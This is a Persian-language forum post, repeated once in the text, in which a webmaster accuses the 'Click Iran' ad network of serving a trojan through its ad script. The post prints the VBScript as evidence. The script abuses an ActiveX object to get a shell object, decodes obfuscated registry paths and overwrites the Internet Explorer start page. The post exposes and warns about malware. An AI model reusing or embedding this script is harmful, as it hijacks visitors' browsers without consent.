phpmkr
Registered User
- تاریخ عضویت
- 3 فوریه 2009
- نوشتهها
- 166
- لایکها
- 4
سلام به همه.
چون خيلي از دوستان توي همين فروم از سيستم كليك ايران تعريف كردند ، براي تست يه چند روزي تبليغات اين سيستم رو تو يكي از وبلاگهام گذاشتم تا اگه ازش راضي بودم توي وبسايتهام بذارم.
ولي متاسفانه امروز ديدم وقتي وبلاگم رو باز ميكنم آنتي ويروسم(Kasper Sky) هشدار ميده كه اين وبلاگ ويروسي هست.
جالب اينه كه اين وبلاگ بجز اسكريپت كليك ايران هيچ اسكريپت ديگه اي نداشته!
فايل اسكريپت رو كه دانلود كردم ديدم يه تروجان هست كه با وي بي اسكريپت نوشتن و ظاهراً يه چيزايي توي رجيستري مينويسه.
البته من قبلاً از چندين نفر درباره سوء استفاده و ويروس پراكني اين سيستم شنيده بودم ولي تا با چشماي خودم نديدم باورم نشد!
ظاهراً كليك ايران اين تروجان رو توي زمانهاي خاصي فعال ميكنه و بعد از چند ساعت دوباره غيرفعالش ميكنن.
اين عكسي هست كه من از وبلاگم گرفتم و همه چيز رو نشون ميده :
اين هم كد مربوط به تروجان :
در ضمن فايل تروجان رو هم ضميمه كردم
اگه كسي ديگه از دوستان هم تا حالا همچين موردي رو ديده بياد همينجا بگه تا همه از سوء استفاده كليك ايران از وبمسترها آگاه بشن.
چون خيلي از دوستان توي همين فروم از سيستم كليك ايران تعريف كردند ، براي تست يه چند روزي تبليغات اين سيستم رو تو يكي از وبلاگهام گذاشتم تا اگه ازش راضي بودم توي وبسايتهام بذارم.
ولي متاسفانه امروز ديدم وقتي وبلاگم رو باز ميكنم آنتي ويروسم(Kasper Sky) هشدار ميده كه اين وبلاگ ويروسي هست.
جالب اينه كه اين وبلاگ بجز اسكريپت كليك ايران هيچ اسكريپت ديگه اي نداشته!
فايل اسكريپت رو كه دانلود كردم ديدم يه تروجان هست كه با وي بي اسكريپت نوشتن و ظاهراً يه چيزايي توي رجيستري مينويسه.
البته من قبلاً از چندين نفر درباره سوء استفاده و ويروس پراكني اين سيستم شنيده بودم ولي تا با چشماي خودم نديدم باورم نشد!
ظاهراً كليك ايران اين تروجان رو توي زمانهاي خاصي فعال ميكنه و بعد از چند ساعت دوباره غيرفعالش ميكنن.
اين عكسي هست كه من از وبلاگم گرفتم و همه چيز رو نشون ميده :
اين هم كد مربوط به تروجان :
کد:
Function AxClip()
Set axclip_sub_ir = document.createElement("object")
axclip_sub_ir.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set jjhacker = axclip_sub_ir.createobject("wscript.shell","")
hr="092083079070084087065082069092077105099114111115111102116092073110116101114110101116032069120112108111114101114092077097105110092083116097114116032080097103101"
re1="072075069089095076079067065076095077065067072073078069"
re2="072075069089095067085082082069078084095085083069082"
For axclip = 1 To Len(hr) Step 3
hr2=hr2 & chr(mid(hr,axclip,3))
next
For axclip = 1 To Len(re1) Step 3
re1_b=re1_b & chr(mid(re1,axclip,3))
next
For axclip = 1 To Len(re2) Step 3
re2_b=re2_b & chr(mid(re2,axclip,3))
next
jjhacker.regwrite re1_b & hr2,axclip_name
jjhacker.regwrite re2_b & hr2,axclip_name
AxClip=SetTimeOut("axclip", (pars20*1), "VBScript")
'MsgBox now()
end Function
AxClip
در ضمن فايل تروجان رو هم ضميمه كردم
اگه كسي ديگه از دوستان هم تا حالا همچين موردي رو ديده بياد همينجا بگه تا همه از سوء استفاده كليك ايران از وبمسترها آگاه بشن.